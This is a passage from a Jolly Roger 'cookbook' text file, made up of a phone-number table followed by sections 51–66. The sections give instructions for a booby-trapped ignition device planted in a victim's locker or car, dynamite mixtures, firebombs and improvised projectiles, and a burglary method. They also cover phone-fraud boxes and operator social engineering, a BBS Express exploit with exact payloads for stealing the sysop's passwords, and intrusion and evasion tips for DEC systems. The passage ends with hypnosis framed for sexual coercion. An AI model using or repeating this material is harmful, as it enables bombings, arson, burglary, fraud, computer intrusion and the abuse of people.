213 415-781-5271 506 506-648-3041 803 912-784-0440
214 214-464-7400 507 402-580-2255 804 304-344-7935
215 412-633-5600 509 206-382-5124 805 415-543-2861
216 614-464-0123 512 512-828-2501 806 512-828-2501
217 217-525-5800 513 614-464-0123 807 416-443-0542
218 402-580-2255 514 514-725-2491 808 212-334-4336
219 317-265-4834 515 402-580-2255 809 212-334-4336
301 304-343-1401 516 518-471-8111 812 317-265-4834
302 412-633-5600 517 313-223-8690 813 813-228-7871
303 303-293-8777 518 518-471-8111 814 412-633-5600
304 304-344-8041 519 416-443-0542 815 217-525-5800
305 912-784-0440 601 601-961-8139 816 816-275-2782
306 306-347-2878 602 303-293-8777 817 214-464-7400
307 303-293-8777 603 617-787-5300 818 415-781-5271
308 402-580-2255 604 604-432-2996 819 514-725-2491
309 217-525-5800 605 402-580-2255 901 615-373-5791
312 312-796-9600 606 502-583-2861 902 902-421-4110
313 313-223-8690 607 518-471-8111 904 912-784-0440
314 314-721-6626 608 608-252-6932 906 313-223-8690
315 518-471-8111 609 201-676-7070 907 *** NONE ***
316 816-275-2782 612 402-580-2255 912 912-784-0440
317 317-265-4834 613 416-443-0542 913 816-275-2782
318 504-245-5330 614 614-464-0123 914 518-471-8111
319 402-580-2255 615 615-373-5791 915 512-828-2501
401 617-787-5300 616 313-223-8690 916 415-543-2861
402 402-580-2255 617 617-787-5300 918 405-236-6121
403 403-425-2652 618 217-525-5800 919 912-784-0440
404 912-784-0440 619 818-501-7251 900 201-676-7070
405 405-236-6121 701 402-580-2255
406 303-293-8777 702 415-543-2861
408 415-543-6374 703 304-344-7935
409 713-861-7194 704 912-784-0440
412 413-633-5600 705 416-979-3469
413 617-787-5300 706 *** NONE ***
414 608-252-6932 707 415-543-6374
51. Electronic Terrorism by The Jolly Roger
1. It starts when a big, dumb lummox rudely insults you. Being of a rational,
intelligent disposition, you wisely choose to avoid a (direct) confrontation.
But as he laughs in your face, you smile
inwardly---your revenge is already planned.
2. Follow your victim to his locker, car, or house. Once you have chosen your
target site, lay low for a week or more, letting your anger boil.
3. In the mean time, assemble your versatile terrorist kit(details below.)
4. Plant your kit at the designated target site on a Monday morning between the
hours of 4:00 am and 6:00 am. Include a calm, suggestive note that quietly hints
at the possibility of another
attack. Do not write it by hand! An example of an effective note: "don't be such
a jerk, or the next one will take off your hand. Have a nice day." Notice how
the calm tone instills fear. As if written
by a homicidal psychopath.
5. Choose a strategic location overlooking the target site. Try to position
yourself in such a way that you can see his facial contortions.
6. Sit back and enjoy the fireworks! Assembly of the versatile, economic, and
effective terrorist kit #1: the parts you'll need are:
· 4 AA batteries
· 1 9-volt battery
· 1 SPDT mini relay (radio shack)
· 1 rocket engine(smoke bomb or m-80)
· 1 solar igniter (any hobby store)
· 1 9-volt battery connector
1. Take the 9-volt battery and wire it through the relay's coil. This circuit
should also include a pair of contacts that when separated cut off this circuit.
These contacts should be held together
by trapping them between the locker, mailbox, or car door. Once the door is
opened, the contacts fall apart and the 9-volt circuit is broken, allowing the
relay to fall to the closed position thus closing
the ignition circuit. (If all this is confusing take a look at the schematic
below.)
2. Take the 4 AA batteries and wire them in succession. Wire the positive
terminal of one to the negative terminal of another, until all four are
connected except one positive terminal and one
negative terminal. Even though the four AA batteries only combine to create 6
volts, the increase in amperage is necessary to activate the solar igniter
quickly and effectively.
3. Take the battery pack (made in step 2) and wire one end of it to the relay's
single pole and the other end to one prong of the solar igniter. Then wire the
other prong of the solar igniter back
to the open position on the relay.
4. Using double sided carpet tape mount the kit in his locker, mailbox, or car
door. And last, insert the solar igniter into the rocket engine (smoke bomb or
m-80).
Your kit is now complete!
---------><---------
I (CONTACTS) I
I I
I - (BATTERY)
I ---
I I
I (COIL) I
------///////-------
/-----------
/ I
/ I
/ I
(SWITCH) I I
I I
I --- (BATTERY)
I - ( PACK )
I ---
I I
I I
---- -----
I I
*
(SOLAR IGNITER)
52. How to Start A Conference w/o 2600hz or M-F by The Jolly Roger
This method of starting the conf. Depends on your ability to bullshit the
operator into dialing a number which can only be reached with an operator's M-F
tones. When bullshitting the operator
remember operator's are not hired to think but to do.
Here is a step-by-step way to the conf.:
Call the operator through a pbx or extender, you could just call one Through
your line but I wouldn't recommend it.
Say to the operator: TSPS maintenance engineer, ring-forward to 213+080+1100,
position release, thank you.(she will probably ask you for the number again)
Definitions:
Ring-forward instructs her to dial the number.
Position release instructs her to release the trunk after she has dialed the
number.
+ - remember to say 213plus080 plus1100.
3. When you are connected with the conf. You will here a whistle blow twice and
a recording asking you for your operator number. Dial in any five digits and hit
the pounds sign a couple of times.
Simply dial in the number of the billing line ect. When the recording ask for
it. When in the control mode of the conf. Hit '6' to transfer control. Hit '001'
to reenter the number of conferee's and time
amount which you gave when you stared the conf. Remember the size can be from
2-59 conferee's. I have not found out the 'lengths' limits.
53. How to Make Dynamite by The Jolly Roger
Dynamite is nothing more than just nitroglycerin and a stabilizing agent to make
it much safer to use. The numbers are percentages, be sure to mix these
carefully and be sure to use the exact amounts.
These percentages are in weight ratio, not volume.
Number Ingredients Amount
1st Nitroglycerin 32%
Sodium Nitrate 28%
Woodmeal 10%
Ammonium Oxalate 29%
Guncotton 1%
2nd Nitroglycerin 24%
Potassium Nitrate 9%
Sodium Nitrate 56%
Woodmeal 9%
Ammonium Oxalate 2%
3rd Nitroglycerin 35½%
Potassium Nitrate 44½%
Woodmeal 6%
Guncotton 2½%
Vaseline 5½%
Powdered Charcoal 6%
4th Nitroglycerin 25%
Potassium Nitrate 26%
Woodmeal 34%
Barium Nitrate 5%
Starch 10%
5th Nitroglycerin 57%
Potassium Nitrate 19%
Woodmeal 9%
Ammonium Oxalate 12%
Guncotton 3%
6th Nitroglycerin 18%
Sodium Nitrate 70%
Woodmeal 5½%
Potassium Chloride 4½%
Chalk 2%
7th Nitroglycerin 26%
Woodmeal 40%
Barium Nitrate 32%
Sodium Carbonate 2%
8th Nitroglycerin 44%
Woodmeal 12%
Anhydrous Sodium Sulfate 44%
9th Nitroglycerin 24%
Potassium Nitrate 32½%
Woodmeal 33½%
Ammonium Oxalate 10%
10th Nitroglycerin 26%
Potassium Nitrate 33%
Woodmeal 41%
11th Nitroglycerin 15%
Sodium Nitrate 62.9%
Woodmeal 21.2%
Sodium Carbonate .9%
12th Nitroglycerin 35%
Sodium Nitrate 27%
Woodmeal 10%
Ammonium Oxalate 1%
13th Nitroglycerin 32%
Potassium Nitrate 27%
Woodmeal 10%
Ammonium Oxalate 30%
Guncotton 1%
14th Nitroglycerin 33%
Woodmeal 10.3%
Ammonium Oxalate 29%
Guncotton .7%
Potassium Perchloride 27%
15th Nitroglycerin 40%
Sodium Nitrate 45%
Woodmeal 15%
16th Nitroglycerin 47%
Starch 50%
Guncotton 3%
17th Nitroglycerin 30%
Sodium Nitrate 22.3%
Woodmeal 40½%
Potassium Chloride 7.2%
18th Nitroglycerin 50%
Sodium Nitrate 32.6%
Woodmeal 17%
Ammonium Oxalate .4%
19th Nitroglycerin 23%
Potassium Nitrate 27½%
Woodmeal 37%
Ammonium Oxalate 8%
Barium Nitrate 4%
Calcium Carbonate ½%
If you can't seem to get one or more of the ingredients try another one. If you
still can't, you can always buy small amounts from your school, or maybe from
various chemical companies. When you do
that, be sure to say as little as possible, if during the school year, and they
ask, say it's for a experiment for school.
54. Auto Exhaust Flame Thrower by The Jolly Roger
For this one, all you need is a car, a spark plug, ignition wire and a switch.
Install the spark plug into the last four or five inches of the tail pipe by
drilling a hole that the plug can screw into easily. Attach
the wire (this is regular insulated wire) to one side of the switch and to the
spark plug. The other side of the switch is attached to the positive terminal on
the battery. With the car running, simply hit the
switch and watch the flames fly!!! Again be careful that no one is behind you! I
have seen some of these flames go 20 feet!!!
55. Breaking into BBS Express by The Jolly Roger
If you have high enough access on any BBS Express BBS you can get the Sysop's
password without any problems and be able to log on as him and do whatever you
like. Download the Pass file,
delete the whole BBS, anything. Its all a matter of uploading a text file and
downloading it from the BBS. You must have high enough access to see new uploads
to do this. If you can see a file you just
uploaded you have the ability to break into the BBS in a few easy steps. Why am
I telling everyone this when I run BBS Express myself? Well there is one way to
stop this from happening and I want
other Sysops to be aware of it and not have it happen to them. Breaking in is
all based on the MENU function of BBS Express. Express will let you create a
menu to display different text files by putting
the word MENU at the top of any text file and stating what files are to be
displayed. But due to a major screw up by Mr. Ledbetter you can use this MENU
option to display the USERLOG and the
Sysop's Passwords or anything else you like. I will show you how to get the
Sysop's pass and therefore log on as the Sysop. BBs Express Sysop's have 2
passwords. One like everyone else gets in the
form of X1XXX, and a Secondary password to make it harder to hack out the Sysops
pass. The Secondary pass is found in a file called SYSDATA.DAT. This file must
be on drive 1 and is therefore
easy to get.
All you have to do is upload this simple Text file:
MENU
1
D1:SYSDATA.DAT
Rip-off time!
After you upload this file you download it non-Xmodem. Stupid Express thinks
it is displaying a menu and you will see this:
Rip-off time!
Selection [0]:
Just hit 1 and Express will display the SYSDATA.DAT file. OPPASS is where the
Sysop's Secondary pass will be. D1:USERLOG.DAT is where you will find the name
and Drive number of the
USERLOG.DAT file. The Sysop might have renamed this file or put it in a
Subdirectory or even on a different drive. I Will Assume he left it as
D1:USERLOG.DAT. The other parts of this file tell you
where the .HLP screens are and where the LOG is saved and all the Download path
names.
Now to get the Sysop's primary pass you upload a text file like this:
MENU
1
D1:USERLOG.DAT
Breaking into Bedwetter's BBS
Again you then download this file non-Xmodem and you will see:
Breaking into Bedwetter's BBS
Selection [0]:
You then hit 1 and the long USERLOG.DAT file comes flying at you. The Sysop is
the first entry in this very long file so it is easy. You will see:
SYSOP'S NAME X1XXX
You should now have his 2 passwords.
There is only one easy way out of this that I can think of, and that is to make
all new uploads go to SYSOP level (Level 9) access only. This way nobody can
pull off what I just explained. I feel this is a
major Bug on Mr. Ledbetter's part. I just don't know why no one had thought of
it before. I would like to give credit to Redline for the message he left on
Modem Hell telling about this problem, and
also to Unka for his ideas and input about correcting it.
56. Firebombs by The Jolly Roger
Most fire bombs are simply gasoline filled bottles with a fuel soaked rag in the
mouth (the bottle's mouth, not yours). The original Molotov cocktail, and still
about the best, was a mixture of one part
gasoline and one part motor oil. The oil helps it to cling to what it splatters
on. Some use one part roofing tar and one part gasoline. Fire bombs have been
found which were made by pouring melted
wax into gasoline.
57. Fuse Ignition Bomb by The Jolly Roger
A four strand homemade fuse is used for this. It burns like fury. It is held
down and concealed by a strip of bent tin cut from a can. The exposed end of the
fuse is dipped into the flare igniter. To use
this one, you light the fuse and hold the fire bomb until the fuse has burned
out of sight under the tin. Then throw it and when it breaks, the burning fuse
will ignite the contents.
58. Generic Bomb by The Jolly Roger
1. Acquire a glass container.
2. Put in a few drops of gasoline.
3. Cap the top.
4. Now turn the container around to coat the inner surfaces and then evaporates.
5. Add a few drops of potassium permanganate (Get this stuff from a snake bite
kit)
6. The bomb is detonated by throwing against a solid object.
After throwing this thing, run like hell. This thing packs about ½ stick of
dynamite.
59. Green Box Plans by the Jolly Roger
Paying the initial rate in order to use a red box (on certain fortresses) left a
sour taste in many red boxers mouths, thus the green box was invented. The green
box generates useful tones such as COIN
COLLECT, COIN RETURN, AND RINGBACK. These are the tones that ACTS or the TSPS
operator would send to the CO when appropriate. Unfortunately, the green box
cannot be used at the
fortress station but must be used by the CALLED party.
Here are the tones:
COIN COLLECT 700+1100hz
COIN RETURN 1100+1700hz
RINGBACK 700+1700hz
Before the called party sends any of these tones, an operator release signal
should be sent to alert the MF detectors at the CO. This can be done by sending
900hz + 1500hz or a single 2600 wink (90
ms.) Also do not forget that the initial rate is collected shortly before the 3
minute period is up. Incidentally, once the above MF tones for collecting and
returning coins reach the CO, they are converted
into an appropriate DC pulse (-130 volts for return and +130 for collect). This
pulse is then sent down the tip to the fortress. This causes the coin relay to
either return or collect the coins. The alleged
"T-network" takes advantage of this information. When a pulse for coin collect
(+130 VDC) is sent down the line, it must be grounded somewhere. This is usually
the yellow or black wire. Thus, if the
wires are exposed, these wires can be cut to prevent the pulse from being
grounded. When the three minute initial period is almost up, make sure that the
black and yellow wires are severed, then hang
up, wait about 15 seconds in case of a second pulse, reconnect the wires, pick
up the phone, and if all goes well, it should be "JACKPOT" time.
60. Portable Grenade Launcher by The Jolly Roger
If you have a bow, this one is for you. Remove the ferrule from an aluminum
arrow, and fill the arrow with black powder (I use grade FFFF, it burns easy)and
then glue a shotshell primer into the hole
left where the ferrule went. Next, glue a BB on the primer, and you are ready to
go! Make sure no one is nearby.... Little shreds of aluminum go all over the
place!!
61. Hacking Tutorial by The Jolly Roger
What is hacking?
According to popular belief the term hacker and hacking was founded at MIT it
comes from the root of a hack writer, someone who keeps "hacking" at the
typewriter until he finishes the story. A
computer hacker would be hacking at the keyboard or password works.
What you need:
To hack you need a computer equipped with a modem (a device that lets you
transmit data over phone lines) which should cost you from $100 to $1200.
How do you hack?
Hacking requires two things:
1. The phone number.
2. Answer to identity elements.
How do you find the phone number?
There are three basic ways to find a computers phone number:
1. Scanning
2. Directory
3. Inside info
What is scanning?
Scanning is the process of having a computer search for a carrier tone. For
example, the computer would start at (800) 111-1111 and wait for carrier if
there is none it will go on to 111-1112 etc. If
there is a carrier it will record it for future use and continue looking for
more.
What is directory assistance?
This way can only be used if you know where your target computer is. For this
example say it is in menlo park, CA and the company name is Sri.
1. Dial 411 (or 415-555-1212)
2. Say "Menlo park"
3. Say "Sri"
4. Write down number
5. Ask if there are any more numbers
6. If so write them down.
7. Hang up on operator
8. Dial all numbers you were given
9. Listen for carrier tone
10. If you hear carrier tone write down number, call it on your modem and your
set to hack!
62. The Basics of Hacking II by The Jolly Roger
Basics to know before doing anything, essential to your continuing career as one
of the elite in the country... This article, "The introduction to the world of
hacking." is meant to help you by telling you
how not to get caught, what not to do on a computer system, what type of
equipment should I know about now, and just a little on the history, past
present future, of the hacker.
Welcome to the world of hacking! We, the people who live outside of the normal
rules, and have been scorned and even arrested by those from the 'civilized
world', are becoming scarcer every day.
This is due to the greater fear of what a good hacker (skill wise, no moral
judgments here) can do nowadays, thus causing anti- hacker sentiment in the
masses. Also, few hackers seem to actually know
about the computer systems they hack, or what equipment they will run into on
the front end, or what they could do wrong on a system to alert the 'higher'
authorities who monitor the system. This
article is intended to tell you about some things not to do, even before you get
on the system. I will tell you about the new wave of front end security devices
that are beginning to be used on computers.
I will attempt to instill in you a second identity, to be brought up at time of
great need, to pull you out of trouble. And, by the way, I take no, repeat, no,
responsibility for what we say in this and the
forthcoming articles.
Enough of the bullshit, on to the fun: after logging on your favorite bbs, you
see on the high access board a phone number! It says it's a great system to
"fuck around with!" This may be true, but how
many other people are going to call the same number? So: try to avoid calling a
number given to the public. This is because there are at least every other user
calling, and how many other boards will
that number spread to? If you call a number far, far away, and you plan on going
through an extender or a re-seller, don't keep calling the same access number
(I.E. As you would if you had a hacker
running), this looks very suspicious and can make life miserable when the phone
bill comes in the mail. Most cities have a variety of access numbers and
services, so use as many as you can. Never trust
a change in the system... The 414's, the assholes, were caught for this reason:
when one of them connected to the system, there was nothing good there. The next
time, there was a trek game stuck
right in their way! They proceeded to play said game for two, say two and a half
hours, while telenet was tracing them! Nice job, don't you think? If anything
looks suspicious, drop the line
immediately!! As in, yesterday!! The point we're trying to get across is: if you
use a little common sense, you won't get busted. Let the little kids who aren't
smart enough to recognize a trap get busted,
it will take the heat off of the real hackers. Now, let's say you get on a
computer
system... It looks great, checks out, everything seems fine. OK, now is when it
gets more dangerous. You have to know the computer system to know what not to
do. Basically, keep away from any
command something, copy a new file into the account, or whatever! Always leave
the account in the same status you logged in with. Change *nothing*... If it
isn't an account with priv's, then don't try
any commands that require them! All, yes all, systems are going to be keeping
log files of what users are doing, and that will show up. It is just like
dropping a trouble-card in an ESS system, after
sending that nice operator a pretty tone. Spend no excessive amounts of time on
the account in one stretch. Keep your calling to the very late night if
possible, or during business hours (believe it or
not!). It so happens that there are more users on during business hours, and it
is very difficult to read a log file with 60 users doing many commands every
minute. Try to avoid systems where everyone
knows each other, don't try to bluff. And above all: never act like you own the
system, or are the best there is. They always grab the people who's heads
swell... There is some very interesting front
end equipment around nowadays, but first let's define terms... By front end, we
mean any device that you must pass through to get at the real computer. There
are devices that are made to defeat
hacker programs, and just plain old multiplexers. To defeat hacker programs,
there are now devices that pick up the phone and just sit there... This means
that your device gets no carrier, thus you
think there isn't a computer on the other end. The only way around it is to
detect when it was picked up. If it picks up after the same number ring, then
you know it is a hacker-defeater. These devices
take a multi-digit code to let you into the system. Some are, in fact, quite
sophisticated to the point where it will also limit the user name's down, so
only one name or set of names can be valid logins
after they input the code... Other devices input a number code, and then they
dial back a pre-programmed number for that code. These systems are best to leave
alone, because they know someone is
playing with their phone. You may think "but I'll just reprogram the dial-back."
Think again, how stupid that is... Then they have your number, or a test loop if
you were just a little smarter. If it's your
number, they have your balls (if male...), if its a loop, then you are screwed
again, since those loops
are *monitored*. As for multiplexers... What a plexer is supposed to do is this:
The system can accept multiple users. We have to time share, so we'll let the
front-end processor do it... Well, this is what a multiplexer does. Usually they
will ask for something like "enter class" or
"line:". Usually it is programmed for a double digit number, or a four to five
letter word. There are usually a few sets of numbers it accepts, but those
numbers also set your 300/1200/2400 baud data
type. These multiplexers are inconvenient at best, so not to worry. A little
about the history of hacking: hacking, by my definition, means a great knowledge
of some special area. Doctors and lawyers
are hackers of a sort, by this definition. But most often, it is being used in
the computer context, and thus we have a definition of "anyone who has a great
amount of computer or telecommunications
knowledge." You are not a hacker because you have a list of codes... Hacking, by
my definition, has then been around only about 15 years. It started, where else
but, MIT and colleges where they
had computer science or electrical engineering departments. Hackers have created
some of the best computer languages, the most awesome operating systems, and
even gone on to make millions.
Hacking used to have a good name, when we could honestly say "we know what we
are doing". Now it means (in the public eye): the 414's, Ron Austin, the NASA
hackers, the arpanet hackers... All
the people who have been caught, have done damage, and are now going to have to
face fines and sentences. Thus we come past the moralistic crap, and to our
purpose: educate the hacker
community, return to the days when people actually knew something...
63. Hacking DEC's by The Jolly Roger
In this article you will learn how to log in to dec's, logging out, and all the
fun stuff to do in-between. All of this information is based on a standard dec
system. Since there are dec systems 10 and 20,
and I favor, the dec 20, there will be more info on them in this article. It
just so happens that the dec 20 is also the more common of the two, and is used
by much more interesting people (if you know
what I mean...) OK, the first thing you want to do when you are receiving
carrier from a dec system is to find out the format of login names. You can do
this by looking at who is on the system.
Dec=> ` (the 'exec' level prompt)
you=> sy
sy: short for sy(stat) and shows you the system status.
You should see the format of login names. A systat usually comes up in this
form:
Job Line Program User
Job: The job number (not important unless you want to log them off later)
Line: What line they are on (used to talk to them...) These are both two or
three digit numbers.
Program: What program are they running under? If it says 'exec' they aren't
doing anything at all...
User: ahhhahhhh! This is the user name they are logged in under... Copy the
format, and hack yourself outa working code... Login format is as such:
dec=> `
you=> login username password
Username is the username in the format you saw above in the systat. After you
hit the space after your username, it will stop echoing characters back to your
screen. This is the password you are
typing in... Remember, people usually use their name, their dog's name, the name
of a favorite character in a book, or something like this. A few clever people
have it set to a key cluster (qwerty or
asdfg). Passwords can be from 1 to 8 characters long, anything after that is
ignored. You are finally in... It would be nice to have a little help, wouldn't
it? Just type a ? Or the word help, and it will give
you a whole list of topics... Some handy characters for you to know would be the
control keys, wouldn't it? Backspace on a dec 20 is rub which is 255 on your
ASCII chart. On the dec 10 it is
control-H. To abort a long listing or a program, control-C works fine. Use
Control-O to stop long output to the terminal. This is handy when playing a
game, but you don't want to control-C out.
Control-T for the time. Control-u will kill the whole line you are typing at the
moment. You may accidentally run a program where the only way out is a
control-X, so keep that in reserve. Control-s to
stop listing, control-Q to continue on both systems. Is your terminal having
trouble?? Like, it pauses for no reason, or it doesn't backspace right? This is
because both systems support many terminals,
and you haven't told it what yours is yet... You are using a VT05 so you need to
tell it you are one.
Dec=> `
you=> information terminal
-or-
You=> info
(This shows you what your terminal is set up as.)
Dec=>all sorts of shit, then the `
you=> set ter vt05
(This sets your terminal type to VT05.)
Now let's see what is in the account (here after abbreviated acct.) that you
have hacked onto. Say:
=> dir
(Short for directory.)
It shows you what the user of the code has save to the disk. There should be a
format like this: xxxxx.Oooxxxxx is the file name, from 1 to 20 characters long.
Ooo is the file type, one of: exe, txt, dat,
bas, cmd and a few others that are system dependant. Exe is a compiled program
that can be run (just by typing its name at the `)
Txt is a text file, which you can see by typing:
=>type xxxxx.Txt
Do not try to:
=>type xxxxx.Exe
(This is very bad for your terminal and will tell you absolutely nothing.)
Dat is data they have saved.
Bas is a basic program, you can have it typed out for you.
Cmd is a command type file, a little too complicated to go into here. Try:
=>take xxxxx.Cmd
By the way, there are other users out there who may have files you can use.
(Gee, why else am I here?)
=> dir <*.*> (Dec 20)
=> dir [*,*] (Dec 10)
* is a wildcard, and will allow you to access the files on other accounts if the
user has it set for public access. If it isn't set for public access, then you
won't see it. To run that program:
dec=> `
you=> username program-name
Username is the directory you saw the file listed under, and file name was what
else but the file name? ** You are not alone ** remember, you said (at the very
start) sy short for systat, and how we
said this showed the other users on the system? Well, you can talk to them, or
at least send a message to anyone you see listed in a systat. You can do this
by:
dec=> the user list (from your systat)
you=> talkusername (Dec 20)
send username (Dec 10)
Talk allows you and them immediate transmission of whatever you/they type to be
sent to the other. Send only allow you one message to be sent, and send, they
will send back to you, with talk you
can just keep going. By the way, you may be noticing with the talk command that
what you type is still acted upon by the parser (control program). To avoid the
constant error messages type either:
you=> ;your message
you=> rem your message
the semi-colon tells the parser that what follows is just a comment. Rem is
short for 'remark' and ignores you from then on until you type a control-Z or
control-C, at which point it puts you back in the
exec mode. To break the connection from a talk command type:
you=> break priv's:
If you happen to have privs, you can do all sorts of things. First of all, you
have to activate those privs.
You=> enable
This gives you a $ prompt, and allows you to do this: whatever you can do to
your own directory you can now do to any other directory. To create a new acct.
Using your privs, just type:
=>build username
If username is old, you can edit it, if it is new, you can define it to be
whatever you wish. Privacy means nothing to a user with privs. By the way, there
are various levels of privs: operator, wheel, cia.
Wheel is the most powerful, being that he can log in from anywhere and have his
powers. Operators have their power because they are at a special terminal
allowing them the privs. Cia is short for
'confidential information access', which allows you a low level amount of privs.
Not to worry though, since you can read the system log file, which also has the
passwords to all the other accounts.
To de-activate your privs, type:
you=> disable
when you have played your greedy heart out, you can finally leave the
system with the command:
=>logout
This logs the job you are using off the system (there may be varients of this
such as kjob, or killjob.)
64. Harmless Bombs by The Jolly Roger
To all those who do not wish to inflict bodily damage on their victims but only
terror. These are weapons that should be used from high places.
1. The Flour Bomb
Take a wet paper towel and pour a given amount of baking flour in the center.
Then wrap it up and put on a rubber band to keep it together. When thrown it
will fly well but when it hits, it
covers the victim with the flower or causes a big puff of flour which will put
the victim in terror since as far as they are concerned, some strange white
powder is all over them. This is a cheap method of
terror and for only the cost of a roll of paper towels and a bag of flour you
and your friends can have loads of fun watching people flee in panic.
2. Smoke Bomb Projectile
All you need is a bunch of those little round smoke bombs and a wrist rocket or
any sling-shot. Shoot the smoke bombs and watch the terror since they think it
will blow up!
3. Rotten Eggs (Good ones)
Take some eggs and get a sharp needle and poke a small hole in the top of each
one. Then let them sit in a warm place for about a week. Then you've got a bunch
of rotten eggs that will
only smell when they hit.
4. Glow in the Dark Terror
Take one of those tubes of glow in the dark stuff and pour the stuff on whatever
you want to throw and when it gets on the victim, they think it's some deadly
chemical or a radioactive
substance so they run in total panic. This works especially well with flower
bombs since a gummy, glowing substance gets all over the victim.
5. Fizzling Panic
Take a baggy of a water-baking soda solution and seal it. (Make sure there is no
air in it since the solution will form a gas and you don't want it to pop on
you.) Then put it in a bigger plastic bag and fill
it with vinegar and seal it. When thrown, the two substances will mix and cause
a violently bubbling substance to go all over the victim.
65. Breaking Into Houses by The Jolly Roger
Okay You Need:
1. Tear Gas or Mace
2. A BB/Pellet Gun
3. An Ice Pick
4. Thick Gloves
What You Do Is:
1. Call the house, or ring doorbell, to find out if they're home.
2. If they're not home then...
3. Jump over the fence or walk through gate (whatever).
4. If you see a dog give him the mace or tear gas.
5. Put the gloves on!!!!!!!
6. Shoot the BB gun slightly above the window locks.
7. Push the ice-pick through the hole (made by the BB gun).
8. Enter window.
9. FIRST...Find the LIVING ROOM. (there're neat things there!).
10. Goto the bedroom to get a pillow case. Put the goodies in the pillow case.
11. Get out <-* FAST! -*>
Notes: You should have certain targets worked out (like computers, Radios, Ect.)
Also <-* NEVER *-> Steal from your own neighborhood. If you think they have an
alarm...<-* FORGET IT! *->.
66. A Guide to Hypnotism by The Jolly Roger
What hypnotism is?
Hypnotism, contrary to common belief, is merely state when your mind and body
are in a state of relaxation and your mind is open to positive, or cleverly
worded negative, influences. It is not a trance
where you:
· Are totally influenceable.
· Cannot lie.
· A sleep which you cannot wake up from without help.
This may bring down your hope somewhat, but, hypnotism is a powerful for self
help, and/or mischief.
Your subconscious mind
Before going in further, I'd like to state that hypnotism not only is great in
the way that it relaxes you and gets you (in the long run) what you want, but
also that it taps a force of incredible power, believe
it or not, this power is your subconscious mind. The subconscious mind always
knows what is going on with every part of your body, every moment of the day. It
protects you from negative influences,
and retains the power to slow your heartbeat down and stuff like that. The
subconscious mind holds just about all the info you would like to know
About yourself, or, in this case, the person you will be hypnotizing. There are
many ways to talk to your subconscious and have it talk back to you. One way is
the ouja board, no its not a spirit, merely
the minds of those who are using it. Another, which I will discuss here, is the
pendulum method. OK, here is how it goes. First, get a ring or a washer and tie
it to a thread a little longer than half of
your forearm. Now, take a sheet of paper and draw a big circle in it. In the big
circle you must now draw a crosshair (a big +). Now, put the sheet of paper on a
table. Next, hold the thread with the
ring or washer on it and place it (holding the thread so that the ring is 1 inch
above the paper swinging) in the middle of the crosshair. Now, swing the thread
so the washer goes up and down, say to
yourself the word "Yes" now, do it side to side and say the word "no". Do it
counter clockwise and say "I don't know". And lastly, do it clockwise and say "I
don't want to say." Now, with the thread
back in the middle of the crosshair, ask yourself questions and wait for the
pendulum to swing in the direction for the answer. (yes, no, I don't know or I
don't want to say...). Soon, to your amazement,
it will be answering questions like anything... Let the pendulum answer, don't
try.. When you try you will never get an answer. Let the answer come to you.
How to induce hypnotism
Now that you know how to talk to your subconscious mind, I will now tell you how
to guide someone into hypnosis. Note that I said guide, you can never, hypnotize
someone, they must be willing.
OK, the subject must be lying or sitting in a comfortable position, relaxed, and
at a time when things aren't going to be interrupted. Tell them the following or
something close to it, in a peaceful,
monotonous tone (not a commanding tone of voice)
Note: Light a candle and place it somewhere where it can be easily seen.
"Take a deep breath through your nose and hold it in for a count of 8. Now,
through your mouth, exhale completely and slowly. Continued breathing long,
deep, breaths through your nose and exhaling
through your mouth. Tense up all your muscles very tight, now, counting from ten
to one, release them slowly, you will find them very relaxed. Now, look at the
candle, as you look at it, with every
breath and passing moment, you are feeling increasingly more and more peaceful
and relaxed. The candles flame is peaceful and bright. As you look at it I will
count from 100 down, as a count, your
eyes will become more and more relaxed, getting more and more tired with each
passing moment." Now, count down from 100, about every 10 numbers say "When I
reach xx your eyes (or you will
find your eyes) are becoming more and more tired." Tell them they may close
their eyes whenever they feel like it. If the persons eyes are still open when
you get to 50 then instead of saying "your eyes
will.." Say "your eyes are...". When their eyes are shut say the following. As
you lie (or sit) here with your eyes comfortably close you find yourself
relaxing more and more with each moment and
breath. The relaxation feels pleasant and blissful so, you happily give way to
this wonderful feeling. Imagine yourself on a cloud, resting peacefully, with a
slight breeze caressing your body. A tingling
sensation begins to work its way, within and without your toes, it slowly moves
up your feet, making them warm, heavy and relaxed. The cloud is soft and
supports your body with its soft texture, the
scene is peaceful and absorbing, the peacefulness absorbs you completely. The
tingling gently and slowly moves up your legs, relaxing them. Making them warm
and heavy. The relaxation feels very
good, it feels so good to relax and let go. As the tingling continues its
journey up into your solar plexus, you feel your inner stomach become very
relaxed. Now, it moves slowly into your chest, making
your breathing relaxed as well. The feeling begins to move up your arms to your
shoulders, making your arms heavy and relaxed as well. You are aware of the
total relaxation you are now
experiencing, and you give way to it. It is good and peaceful, the tingling now
moves into your face and head, relaxing your jaws, neck, and facial muscles,
making your cares and worries float away.
Away into the blue sky as you rest blissfully on the cloud. If they are not
responsive or you think they (he or she) is going to sleep, then add in a
"...always concentrating upon my voice, ignoring all other
sounds. Even though other sounds exists, they aid you in your relaxation..."
They should soon let out a sigh as if they were letting go, and their face
should have a "woodiness" to it, becoming
featureless... Now, say the following "... You now find yourself in a hallway,
the hallway is peaceful and nice. As I count from 10 to 1 you will imagine
yourself walking further and further down the hall.
When I reach one you will find yourself where you want to be, in another, higher
state of conscious and mind. (count from ten to one)..." Do this about three or
four times. Then, to test if the subject is
under hypnosis or not, say "... You feel a strange sensation in your (arm they
write with) arm, the feeling begins at your fingers and slowly moves up your
arm, as it moves through your arm your arm
becomes lighter and lighter, it will soon be so light it will ... becoming
lighter and lighter which each breath and moment..." Their fingers should begin
to twitch and then move up, the arm following, now
my friend, you have him/her in hypnosis. The first time you do this, while
he/she is under say good things, like: "Your going to feel great tomorrow" or
"Every day in every way you will find yourself
becoming better and better".. Or some crap like that... The more they go under,
the deeper in hypnosis they will get each time you do it.
What to do when hypnotized
When you have them under you must word things very carefully to get your way.
You cannot simply say... Take off your clothes and fuck the pillow. No, that
would not really do the trick. You must
say something like.... "you find your self at home, in your room and you have to
take a shower (vividly describe their room and what's happening), you begin to
take off your clothes..." Now, it can't be
that simple, you must know the persons house, room, and shower room. Then
describe things vividly and tell them to act it out (they have to be deeply
under to do this). I would just suggest that you
experiment a while, and get to know how to do things.
Waking up
Waking up is very easy, just say "...as I count from 1 to 5 you will find
yourself becoming more and more awake, more and more lively. When you wake up
you will find yourself completely alive,
awake, and refreshed. Mentally and physically, remembering the pleasant
sensation that hypnosis brings... Waking up feeling like a new born baby, reborn
with life and vigor, feeling excellent.
Remembering that next time you enter hypnosis it will become an ever increasing
deeper and deeper state than before.
1. You feel energy course throughout your limbs.
2. You begin to breathe deeply, stirring.
